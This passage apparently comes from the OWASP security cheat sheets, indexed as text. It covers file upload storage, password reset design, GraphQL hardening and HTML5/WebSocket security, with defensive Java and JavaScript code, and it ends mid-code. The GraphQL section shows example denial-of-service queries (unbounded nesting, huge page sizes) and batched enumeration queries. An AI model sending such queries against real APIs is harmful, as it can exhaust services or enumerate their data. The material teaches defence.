Adding some automation to the review could be helpful, which is a harsh process and should be well studied before its usage. Some services (e.g. Virus Total) provide APIs to scan files against well known malicious file hashes. Some frameworks can check and validate the raw content type and validating it against predefined file types, such as in ASP.NET Drawing Library. Beware of data leakage threats and information gathering by public services.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-storage-location","title":"File Storage Location","text":"

The location where the files should be stored must be chosen based on security and business requirements. The following points are set by security priority, and are inclusive:

  1. Store the files on a different host, which allows for complete segregation of duties between the application serving the user, and the host handling file uploads and their storage.
  2. Store the files outside the webroot, where only administrative access is allowed.
  3. Store the files inside the webroot, and set them in write permissions only.
  4. If read access is required, setting proper controls is a must (e.g. internal IP, authorized user, etc.)

Storing files in a studied manner in databases is one additional technique. This is sometimes used for automatic backup processes, non file-system attacks, and permissions issues. In return, this opens up the door to performance issues (in some cases), storage considerations for the database and its backups, and this opens up the door to SQLi attack. This is advised only when a DBA is on the team and that this process shows to be an improvement on storing them on the file-system.

Some files are emailed or processed once they are uploaded, and are not stored on the server. It is essential to conduct the security measures discussed in this sheet before doing any actions on them.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#user-permissions","title":"User Permissions","text":"

Before any file upload service is accessed, proper validation should occur on two levels for the user uploading a file:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#filesystem-permissions","title":"Filesystem Permissions","text":"

Set the files permissions on the principle of least privilege.

Files should be stored in a way that ensures:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#upload-and-download-limits","title":"Upload and Download Limits","text":"

The application should set proper size limits for the upload service in order to protect the file storage capacity. If the system is going to extract the files or process them, the file size limit should be considered after file decompression is conducted and by using secure methods to calculate zip files size. For more on this, see how to Safely extract files from ZipInputStream, Java's input stream to handle ZIP files.

The application should set proper request limits as well for the download service if available to protect the server from DoS attacks.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#java-code-snippets","title":"Java Code Snippets","text":"

Document Upload Protection repository written by Dominique for certain document types in Java.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html","title":"Forgot Password Cheat Sheet","text":""},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#introduction","title":"Introduction","text":"

In order to implement a proper user management system, systems integrate a Forgot Password service that allows the user to request a password reset.

Even though this functionality looks straightforward and easy to implement, it is a common source of vulnerabilities, such as the renowned user enumeration attack.

The following short guidelines can be used as a quick reference to protect the forgot password service:

This cheat sheet is focused on resetting users passwords. For guidance on resetting multifactor authentication (MFA), see the relevant section in the Multifactor Authentication Cheat Sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#forgot-password-service","title":"Forgot Password Service","text":"

The password reset process can be broken into two main steps, detailed in the following sections.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#forgot-password-request","title":"Forgot Password Request","text":"

When a user uses the forgot password service and inputs their username or email, the below should be followed to implement a secure process:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#user-resets-password","title":"User Resets Password","text":"

Once the user has proved their identity by providing the token (sent via an email) or code (sent via SMS or other mechanisms), they should reset their password to a new secure one. In order to secure this step, the measures that should be taken are:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#methods","title":"Methods","text":"

In order to allow a user to request a password reset, you will need to have some way to identify the user, or a means to reach out to them through a side-channel.

This can be done through any of the following methods:

These methods can be used together to provide a greater degree of assurance that the user is who they claim to be. No matter what, you must ensure that a user always has a way to recover their account, even if that involves contacting the support team and proving their identity to staff.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#general-security-practices","title":"General Security Practices","text":"

It is essential to employ good security practices for the reset identifiers (tokens, codes, PINs, etc.). Some points don't apply to the offline methods, such as the lifetime restriction. All tokens and codes should be:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#url-tokens","title":"URL Tokens","text":"

URL tokens are passed in the query string of the URL, and are typically sent to the user via email. The basic overview of the process is as follows:

  1. Generate a token to the user and attach it in the URL query string.
  2. Send this token to the user via email.
  3. Don't rely on the Host header while creating the reset URLs to avoid Host Header Injection attacks. The URL should be either be hard-coded, or should be validated against a list of trusted domains.
  4. Ensure that the URL is using HTTPS.
  5. The user receives the email, and browses to the URL with the attached token.
  6. Ensure that the reset password page adds the Referrer Policy tag with the noreferrer value in order to avoid referrer leakage.
  7. Implement appropriate protection to prevent users from brute-forcing tokens in the URL, such as rate limiting.
  8. If required, perform any additional validation steps such as requiring the user to answer security questions.
  9. Let the user create a new password and confirm it. Ensure that the same password policy used elsewhere in the application is applied.

Note: URL tokens can follow on the same behavior of the PINs by creating a restricted session from the token. Decision should be made based on the needs and the expertise of the developer.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#pins","title":"PINs","text":"

PINs are numbers (between 6 and 12 digits) that are sent to the user through a side-channel such as SMS.

  1. Generate a PIN.
  2. Send it to the user via SMS or another mechanism.
  3. Breaking the PIN up with spaces makes it easier for the user to read and enter.
  4. The user then enters the PIN along with their username on the password reset page.
  5. Create a limited session from that PIN that only permits the user to reset their password.
  6. Let the user create a new password and confirm it. Ensure that the same password policy used elsewhere in the application is applied.
"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#offline-methods","title":"Offline Methods","text":"

Offline methods differ from other methods by allowing the user to reset their password without requesting a special identifier (such as a token or PIN) from the backend. However, authentication still needs to be conducted by the backend to ensure that the request is legitimate. Offline methods provide a certain identifier either on registration, or when the user wishes to configure it.

These identifiers should be stored offline and in a secure fashion (e.g. password managers), and the backend should properly follow the general security practices. Some implementations are built on hardware OTP tokens, certificates, or any other implementation that could be used inside of an enterprise. These are out of scope for this cheat sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#backup-codes","title":"Backup Codes","text":"

Backup codes should be provided to the user upon registering where the user should store them offline in a secure place (such as their password manager). Some companies that implement this method are Google, GitHub, and Auth0.

While implementing this method, the following practices should be followed:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#security-questions","title":"Security Questions","text":"

Security questions should not be used as the sole mechanism for resetting passwords due to their answers frequently being easily guessable or obtainable by attackers. However, they can provide an additional layer of security when combined with the other methods discussed in this cheat sheet. If they are used, then ensure that secure questions are chosen as discussed in the Security Questions cheat sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#account-lockout","title":"Account Lockout","text":"

Accounts should not be locked out in response to a forgotten password attack, as this can be used to deny access to users with known usernames. For more details on account lockouts, see the Authentication Cheat Sheet.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html","title":"GraphQL Cheat Sheet","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#introduction","title":"Introduction","text":"

GraphQL is an open source query language originally developed by Facebook that can be used to build APIs as an alternative to REST and SOAP. It has gained popularity since its inception in 2012 because of the native flexibility it offers to those building and calling the API. There are GraphQL servers and clients implemented in various languages. Many companies use GraphQL including GitHub, Credit Karma, Intuit, and PayPal.

This Cheat Sheet provides guidance on the various areas that need to be considered when working with GraphQL:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#common-attacks","title":"Common Attacks","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#best-practices-and-recommendations","title":"Best Practices and Recommendations","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#input-validation","title":"Input Validation","text":"

Adding strict input validation can help prevent against injection and DoS. The main design for GraphQL is that the user supplies one or more identifiers and the backend has a number of data fetchers making HTTP, DB, or other calls using the given identifiers. This means that user input will be included in HTTP requests, DB queries, or other requests/calls which provides opportunity for injection that could lead to various injection attacks or DoS.

See the OWASP Cheat Sheets on Input Validation and general injection prevention for full details to best perform input validation and prevent injection.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#general-practices","title":"General Practices","text":"

Validate all incoming data to only allow valid values (i.e. allow list).

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#injection-prevention","title":"Injection Prevention","text":"

When handling input meant to be passed to another interpreter (e.g. SQL/NoSQL/ORM, OS, LDAP, XML):

For more information see the below pages:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#process-validation","title":"Process Validation","text":"

When using user input, even if sanitized and/or validated, it should not be used for certain purposes that would give a user control over data flow. For example, do not make an HTTP/resource request to a host that the user supplies (unless there is an absolute business need).

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#dos-prevention","title":"DoS Prevention","text":"

DoS is an attack against the availability and stability of the API that can make it slow, unresponsive, or completely unavailable. This CS details several methods to limit the possibility of a DoS attack at the application level and other layers of the tech stack. There is also a CS dedicated to the topic of DoS.

Here are recommendations specific to GraphQL to limit the potential for DoS:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-limiting-depth-amount","title":"Query Limiting (Depth & Amount)","text":"

In GraphQL each query has a depth (e.g. nested objects) and each object requested in a query can have an amount specified (e.g. 99999999 of an object). By default these can both be unlimited which may lead to a DoS. You should set limits on depth and amount to prevent DoS, but this usually requires a small custom implementation as it is not natively supported by GraphQL. See this\u00a0and this page for more information about these attacks and how to add depth and amount limiting. Adding pagination can also help performance.

APIs using graphql-java can utilize the built-in MaxQueryDepthInstrumentation for depth limiting. APIs using JavaScript can use graphql-depth-limit to implement depth limiting and graphql-input-number to implement amount limiting.

Here is an example of a GraphQL query with depth N:

query evil {            # Depth: 0\nalbum(id: 42) {       # Depth: 1\nsongs {             # Depth: 2\nalbum {           # Depth: 3\n...             # Depth: ...\nalbum {id: N}   # Depth: N\n}\n}\n}\n}\n

Here is an example of a GraphQL query requesting 99999999 of an object:

query {\nauthor(id: \"abc\") {\nposts(first: 99999999) {\ntitle\n}\n}\n}\n
"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#timeouts","title":"Timeouts","text":"

Adding timeouts can be a simple way to limit how many resources any single request can consume. But timeouts are not always effective since they may not activate until a malicious query has already consumed excessive resources. Timeout requirements will differ by API and data fetching mechanism; there isn't one timeout value that will work across the board.

At the application level, timeouts can be added for queries and resolver functions. This option is usually more effective since the query/resolution can be stopped once the timeout is reached. GraphQL does not natively support query timeouts so custom code is required. See this blog post for more about using timeouts with GraphQL or the two examples below.

JavaScript Timeout Example

Code snippet from this SO answer:

request.incrementResolverCount =  function () {\nvar runTime = Date.now() - startTime;\nif (runTime > 10000) {  // a timeout of 10 seconds\nif (request.logTimeoutError) {\nlogger('ERROR', `Request ${request.uuid} query execution timeout`);\n}\nrequest.logTimeoutError = false;\nthrow 'Query execution has timeout. Field resolution aborted';\n}\nthis.resolverCount++;\n};\n

Java Timeout Example using Instrumentation

public class TimeoutInstrumentation extends SimpleInstrumentation {\n@Override\npublic DataFetcher<?> instrumentDataFetcher(\nDataFetcher<?> dataFetcher, InstrumentationFieldFetchParameters parameters\n) {\nreturn environment ->\nObservable.fromCallable(() -> dataFetcher.get(environment))\n.subscribeOn(Schedulers.computation())\n.timeout(10, TimeUnit.SECONDS)  // timeout of 10 seconds\n.blockingFirst();\n}\n}\n

Infrastructure Timeout

Another option to add a timeout that is usually easier is adding a timeout on an HTTP server (Apache/httpd, nginx), reverse proxy, or load balancer. However, infrastructure timeouts are often inaccurate and can be bypassed more easily than application-level ones.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-cost-analysis","title":"Query Cost Analysis","text":"

Query cost analysis involves assigning costs to the resolution of fields or types in incoming queries so that the server can reject queries that cost too much to run or will consume too many resources. This is not easy to implement and may not always be necessary but it is the most thorough approach to preventing DoS. See \"Query Cost Analysis\" in\u00a0this blog post for more details on implementing this control.

Apollo recommends:

Before you go ahead and spend a ton of time implementing query cost analysis be certain you need it. Try to crash or slow down your staging API with a nasty query and see how far you get \u2014 maybe your API doesn\u2019t have these kinds of nested relationships, or maybe it can handle fetching thousands of records at a time perfectly fine and doesn\u2019t need query cost analysis!

APIs using graphql-java can utilize the built-in MaxQueryComplexityInstrumentationto to enforce max query complexity. APIs using JavaScript can utilize graphql-cost-analysis or graphql-validation-complexity to enforce max query cost.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#rate-limiting","title":"Rate Limiting","text":"

Enforcing rate limiting on a per IP or user (for anonymous and unauthorized access) basis can help limit a single user's ability to spam requests to the service and impact performance. Ideally this can be done with a WAF, API gateway, or web server (Nginx, Apache/HTTPD) to reduce the effort of adding rate limiting.

Or you could get somewhat complex with throttling and implement it in your code (non-trivial). See \"Throttling\" here for more about GraphQL-specific rate limiting.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#server-side-batching-and-caching","title":"Server-side Batching and Caching","text":"

To increase efficiency of a GraphQL API and reduce its resource consumption, the batching and caching technique can be used to prevent making duplicate requests for pieces of data within a small time frame. Facebook's DataLoader tool is one way to implement this.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#system-resource-management","title":"System Resource Management","text":"

Not properly limiting the amount of resources your API can use (e.g. CPU or memory), may compromise your API responsiveness and availability, leaving it vulnerable to DoS attacks. Some limiting can be done at the operating system level.

On Linux, a combination of Control Groups(cgroups), User Limits (ulimits), and Linux Containers (LXC) can be used.

However, containerization platforms tend to make this task much easier. See the resource limiting section in the Docker Security Cheat Sheet for how to prevent DoS when using containers.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#access-control","title":"Access Control","text":"

To ensure that a GraphQL API has proper access control, do the following:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#general-data-access","title":"General Data Access","text":"

It's commonplace for GraphQL requests to include one or more direct IDs of objects in order to fetch or modify them. For example, a request for a certain picture may include the ID that is actually the primary key in the database for that picture. As with any request, the server must verify that the caller has access to the object they are requesting. But sometimes developers make the mistake of assuming that possession of the object's ID means the caller should have access. Failure to verify the requester's access in this case is called Broken Object Level Authentication, also known as IDOR.

It's possible for a GraphQL API to support access to objects using their ID even if that is not intended. Sometimes there are node or nodes or both fields in a query object, and these can be used to access objects directly by ID. You can check whether your schema has these fields by running this on the command-line (assuming that schema.json contains your GraphQL schema): cat schema.json | jq \".data.__schema.types[] | select(.name==\\\"Query\\\") | .fields[] | .name\" | grep node. Removing these fields from the schema should disable the functionality, but you should always apply proper authorization checks to verify the caller has access to the object they are requesting.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-access-data-fetching","title":"Query Access (Data Fetching)","text":"

As part of a GraphQL API there will be various data fields that can be returned. One thing to consider is if you want different levels of access around these fields. For example, you may only want certain consumers to be able to fetch certain data fields rather than allowing all consumers to be able to retrieve all available fields. This can be done by adding a check in the code to ensure that the requester should be able to read a field they are trying to fetch.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation","title":"Mutation Access (Data Manipulation)","text":"

GraphQL supports mutation, or manipulation of data, in addition to its most common use case of data fetching. If an API implements/allows mutation then there may need to be access controls put in place to restrict which consumers, if any, can modify data through the API. Setups that require mutation access control would include APIs where only read access is intended for requesters or where only certain parties should be able to modify certain fields.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#batching-attacks","title":"Batching Attacks","text":"

GraphQL supports batching requests, also known as query batching. This lets callers to either batch multiple queries or batch requests for multiple object instances in a single network call, which allows for what is called a batching attack. This is a form of brute force attack, specific to GraphQL, that usually allows for faster and less detectable exploits. Here is the most common way to do query batching:

[\n{\nquery: < query 0 >,\nvariables: < variables for query 0 >,\n},\n{\nquery: < query 1 >,\nvariables: < variables for query 1 >,\n},\n{\nquery: < query n >\nvariables: < variables for query n >,\n}\n]\n

And here is an example query of a single batched GraphQL call requesting multiple different instances of the droid object:

query {\ndroid(id: \"2000\") {\nname\n}\nsecond:droid(id: \"2001\") {\nname\n}\nthird:droid(id: \"2002\") {\nname\n}\n}\n

In this case it could be used to enumerate every possible droid object that is stored on the server in very few network requests as opposed to a standard REST API where the requester would need to submit a different network request for every different droid ID they want to request. This type of attack can lead to the following issues:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#mitigating-batching-attacks","title":"Mitigating Batching Attacks","text":"

In order to mitigate this type of attack you should put limits on incoming requests at the code level so that they can be applied per request. There are 3 main options:

One option is to create a code-level rate limit on how many objects that callers can request. This means the backend would track how many different object instances the caller has requested, so that they will be blocked after requesting too many objects even if they batch the object requests in a single network call. This replicates a network-level rate limit that a WAF or other tool would do.

Another option is to prevent batching for sensitive objects that you don't want to be brute forced, such as usernames, emails, passwords, OTPs, session tokens, etc. This way an attacker is forced to attack the API like a REST API and make a different network call per object instance. This is not supported natively so it will require a custom solution. However once this control is put in place other standard controls will function normally to help prevent any brute forcing.

Limiting the number of operations that can be batched and run at once is another option to mitigate GraphQL batching attacks leading to DoS. This is not a silver bullet though and should be used in conjunction with other methods.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#secure-configurations","title":"Secure Configurations","text":"

By default, most GraphQL implementations have some insecure default configurations which should be changed:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#introspection-graphiql","title":"Introspection + GraphiQL","text":"

GraphQL Often comes by default with introspection and/or GraphiQL enabled and not requiring authentication. This allows the consumer of your API to learn everything about your API, schemas, mutations, deprecated fields and sometimes unwanted \"private fields\".

This might be an intended configuration if your API is designed to be consumed by external clients, but can also be an issue if the API was designed to be used internally only. Although security by obscurity is not recommended, it might be a good idea to consider removing the Introspection to avoid any leak. If your API is publicly consumed, you might want to consider disabling it for not authenticated or unauthorized users.

For internal API, the easiest approach is to just disable introspection system-wide. See this page or consult your GraphQL implementation's documentation to learn how to disable introspection altogether. If your implementation does not natively support disabling introspection or if you would like to allow some consumers/roles to have this access, you can build a filter in your service to only allow approved consumers to access the introspection system.

Keep in mind that even if introspection is disabled, attackers can still guess fields by brute forcing them. Furthermore, GraphQL has a built-in feature to return a hint when a field name that the requester provides is similar (but incorrect) to an existing field (e.g. request has usr and the response will ask Did you mean \"user?\"). You should consider disabling this feature if you have disabled the introspection, to decrease the exposure, but not all implementations of GraphQL support doing so. Shapeshifter is one tool that should be able to do this.

Disable Introspection - Java

GraphQLSchema schema = GraphQLSchema.newSchema()\n.query(StarWarsSchema.queryType)\n.fieldVisibility( NoIntrospectionGraphqlFieldVisibility.NO_INTROSPECTION_FIELD_VISIBILITY )\n.build();\n

Disable Introspection & GraphiQL - JavaScript

app.use('/graphql', graphqlHTTP({\nschema: MySessionAwareGraphQLSchema,\n+ validationRules: [NoIntrospection]\ngraphiql: process.env.NODE_ENV === 'development',\n}));\n
"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#dont-return-excessive-errors","title":"Don't Return Excessive Errors","text":"

GraphQL APIs in production shouldn't return stack traces or be in debug mode. Doing this is implementation specific, but using middleware is one popular way to have better control over errors the server returns. To disable excessive errors with Apollo Server, either pass debug: false to the Apollo Server constructor or set the NODE_ENV environment variable to 'production' or 'test'. However, if you would like to log the stack trace internally without returning it to the user see here for how to mask and log errors so they are available to the developers but not callers of the API.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#other-resources","title":"Other Resources","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#tools","title":"Tools","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#graphql-security-best-practices-documentation","title":"GraphQL Security Best Practices + Documentation","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#more-on-graphql-attacks","title":"More on GraphQL Attacks","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html","title":"HTML5 Security Cheat Sheet","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The following cheat sheet serves as a guide for implementing HTML 5 in a secure fashion.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#communication-apis","title":"Communication APIs","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#web-messaging","title":"Web Messaging","text":"

Web Messaging (also known as Cross Domain Messaging) provides a means of messaging between documents from different origins in a way that is generally safer than the multiple hacks used in the past to accomplish this task. However, there are still some recommendations to keep in mind:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#cross-origin-resource-sharing","title":"Cross Origin Resource Sharing","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#websockets","title":"WebSockets","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#server-sent-events","title":"Server-Sent Events","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#storage-apis","title":"Storage APIs","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#local-storage","title":"Local Storage","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#client-side-databases","title":"Client-side databases","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#geolocation","title":"Geolocation","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#web-workers","title":"Web Workers","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing","title":"Tabnabbing","text":"

Attack is described in detail in this article.

To summarize, it's the capacity to act on parent page's content or location from a newly opened page via the back link exposed by the opener JavaScript object instance.

It applies to an HTML link or a JavaScript window.open function using the attribute/instruction target to specify a target loading location that does not replace the current location and then makes the current window/tab available.

To prevent this issue, the following actions are available:

Cut the back link between the parent and the child pages:

As the behavior using the elements above is different between the browsers, either use an HTML link or JavaScript to open a window (or tab), then use this configuration to maximize the cross supports:

function openPopup(url, name, windowFeatures){\n//Open the popup and set the opener and referrer policy instruction\nvar newWindow = window.open(url, name, 'noopener,noreferrer,' + windowFeatures);\n//Reset the opener link\nnewWindow.opener = null;\n}\n

Compatibility matrix:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#sandboxed-frames","title":"Sandboxed frames","text":"

It is possible to have a fine-grained control over iframe capabilities using the value of the sandbox attribute.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#credential-and-personally-identifiable-information-pii-input-hints","title":"Credential and Personally Identifiable Information (PII) Input hints","text":"

Access a financial account from a public computer. Even though one is logged-off, the next person who uses the machine can log-in because the browser autocomplete functionality. To mitigate this, we tell the input fields not to assist in any way.

<input type=\"text\" spellcheck=\"false\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\"></input>\n

Text areas and input fields for PII (name, email, address, phone number) and login credentials (username, password) should be prevented from being stored in the browser. Use these HTML5 attributes to prevent the browser from storing PII from your form:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#offline-applications","title":"Offline Applications","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#progressive-enhancements-and-graceful-degradation-risks","title":"Progressive Enhancements and Graceful Degradation Risks","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#http-headers-to-enhance-security","title":"HTTP Headers to enhance security","text":"

Consult the project OWASP Secure Headers in order to obtains the list of HTTP security headers that an application should use to enable defenses at browser level.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#websocket-implementation-hints","title":"WebSocket implementation hints","text":"

In addition to the elements mentioned above, this is the list of areas for which caution must be taken during the implementation.

The section below will propose some implementation hints for every area and will go along with an application example showing all the points described.

The complete source code of the example application is available here.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#access-filtering","title":"Access filtering","text":"

During a websocket channel initiation, the browser sends the Origin HTTP request header that contains the source domain initiation for the request to handshake. Even if this header can be spoofed in a forged HTTP request (not browser based), it cannot be overridden or forced in a browser context. It then represents a good candidate to apply filtering according to an expected value.

An example of an attack using this vector, named Cross-Site WebSocket Hijacking (CSWSH), is described here.

The code below defines a configuration that applies filtering based on an \"allow list\" of origins. This ensures that only allowed origins can establish a full handshake:

import org.owasp.encoder.Encode;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.server.ServerEndpointConfig;\nimport java.util.Arrays;\nimport java.util.List;\n\n/**\n * Setup handshake rules applied to all WebSocket endpoints of the application.\n * Use to setup the Access Filtering using \"Origin\" HTTP header as input information.\n *\n * @see \"http://docs.oracle.com/javaee/7/api/index.html?javax/websocket/server/\n * ServerEndpointConfig.Configurator.html\"\n * @see \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin\"\n */\npublic class EndpointConfigurator extends ServerEndpointConfig.Configurator {\n\n/**\n     * Logger\n     */\nprivate static final Logger LOG = LoggerFactory.getLogger(EndpointConfigurator.class);\n\n/**\n     * Get the expected source origins from a JVM property in order to allow external configuration\n     */\nprivate static final List<String> EXPECTED_ORIGINS =  Arrays.asList(System.getProperty(\"source.origins\")\n.split(\";\"));\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic boolean checkOrigin(String originHeaderValue) {\nboolean isAllowed = EXPECTED_ORIGINS.contains(originHeaderValue);\nString safeOriginValue = Encode.forHtmlContent(originHeaderValue);\nif (isAllowed) {\nLOG.info(\"[EndpointConfigurator] New handshake request received from {} and was accepted.\",\nsafeOriginValue);\n} else {\nLOG.warn(\"[EndpointConfigurator] New handshake request received from {} and was rejected !\",\nsafeOriginValue);\n}\nreturn isAllowed;\n}\n\n}\n
"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#authentication-and-inputoutput-validation","title":"Authentication and Input/Output validation","text":"

When using websocket as communication channel, it's important to use an authentication method allowing the user to receive an access Token that is not automatically sent by the browser and then must be explicitly sent by the client code during each exchange.

HMAC digests are the simplest method, and JSON Web Token is a good feature rich alternative, because it allows the transport of access ticket information in a stateless and not alterable way. Moreover, it defines a validity timeframe. You can find additional information about JWT token hardening on this cheat sheet.

JSON Validation Schema are used to define and validate the expected content in input and output messages.

The code below defines the complete authentication messages flow handling:

Authentication Web Socket endpoint - Provide a WS endpoint that enables authentication exchange

import org.owasp.pocwebsocket.configurator.EndpointConfigurator;\nimport org.owasp.pocwebsocket.decoder.AuthenticationRequestDecoder;\nimport org.owasp.pocwebsocket.encoder.AuthenticationResponseEncoder;\nimport org.owasp.pocwebsocket.handler.AuthenticationMessageHandler;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.CloseReason;\nimport javax.websocket.OnClose;\nimport javax.websocket.OnError;\nimport javax.websocket.OnOpen;\nimport javax.websocket.Session;\nimport javax.websocket.server.ServerEndpoint;\n\n/**\n * Class in charge of managing the client authentication.\n *\n * @see \"http://docs.oracle.com/javaee/7/api/javax/websocket/server/ServerEndpointConfig.Configurator.html\"\n * @see \"http://svn.apache.org/viewvc/tomcat/trunk/webapps/examples/WEB-INF/classes/websocket/\"\n */\n@ServerEndpoint(value = \"/auth\", configurator = EndpointConfigurator.class,\nsubprotocols = {\"authentication\"}, encoders = {AuthenticationResponseEncoder.class},\ndecoders = {AuthenticationRequestDecoder.class})\npublic class AuthenticationEndpoint {\n\n/**\n     * Logger\n     */\nprivate static final Logger LOG = LoggerFactory.getLogger(AuthenticationEndpoint.class);\n\n/**\n     * Handle the beginning of an exchange\n     *\n     * @param session Exchange session information\n     */\n@OnOpen\npublic void start(Session session) {\n//Define connection idle timeout and message limits in order to mitigate as much as possible\n//DOS attacks using massive connection opening or massive big messages sending\nint msgMaxSize = 1024 * 1024;//1 MB\nsession.setMaxIdleTimeout(60000);//1 minute\nsession.setMaxTextMessageBufferSize(msgMaxSize);\nsession.setMaxBinaryMessageBufferSize(msgMaxSize);\n//Log exchange start\nLOG.info(\"[AuthenticationEndpoint] Session {} started\", session.getId());\n//Affect a new message handler instance in order to process the exchange\nsession.addMessageHandler(new AuthenticationMessageHandler(session.getBasicRemote()));\nLOG.info(\"[AuthenticationEndpoint] Session {} message handler affected for processing\",\nsession.getId());\n}\n\n/**\n     * Handle error case\n     *\n     * @param session Exchange session information\n     * @param thr     Error details\n     */\n@OnError\npublic void onError(Session session, Throwable thr) {\nLOG.error(\"[AuthenticationEndpoint] Error occur in session {}\", session.getId(), thr);\n}\n\n/**\n     * Handle close event\n     *\n     * @param session     Exchange session information\n     * @param closeReason Exchange closing reason\n     */\n@OnClose\npublic void onClose(Session session, CloseReason closeReason) {\nLOG.info(\"[AuthenticationEndpoint] Session {} closed: {}\", session.getId(),\ncloseReason.getReasonPhrase());\n}\n\n}\n

Authentication message handler - Handle all authentication requests

import org.owasp.pocwebsocket.enumeration.AccessLevel;\nimport org.owasp.pocwebsocket.util.AuthenticationUtils;\nimport org.owasp.pocwebsocket.vo.AuthenticationRequest;\nimport org.owasp.pocwebsocket.vo.AuthenticationResponse;\nimport org.owasp.encoder.Encode;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.MessageHandler;\nimport javax.websocket.RemoteEndpoint;\nimport java.io.IOException;\n\n/**\n * Handle authentication message flow\n */\npublic class AuthenticationMessageHandler implements MessageHandler.Whole<AuthenticationRequest> {\n\nprivate static final Logger LOG = LoggerFactory.getLogger(AuthenticationMessageHandler.class);\n\n/**\n     * Reference to the communication channel with the client\n     */\nprivate RemoteEndpoint.Basic clientConnection;\n\n/**\n     * Constructor\n     *\n     * @param clientConnection Reference to the communication channel with the client\n     */\npublic AuthenticationMessageHandler(RemoteEndpoint.Basic clientConnection) {\nthis.clientConnection = clientConnection;\n}\n\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void onMessage(AuthenticationRequest message) {\nAuthenticationResponse response = null;\ntry {\n//Authenticate\nString authenticationToken = \"\";\nString accessLevel = this.authenticate(message.getLogin(), message.getPassword());\nif (accessLevel != null) {\n//Create a simple JSON token representing the authentication profile\nauthenticationToken = AuthenticationUtils.issueToken(message.getLogin(), accessLevel);\n}\n//Build the response object\nString safeLoginValue = Encode.forHtmlContent(message.getLogin());\nif (!authenticationToken.isEmpty()) {\nresponse = new AuthenticationResponse(true, authenticationToken, \"Authentication succeed 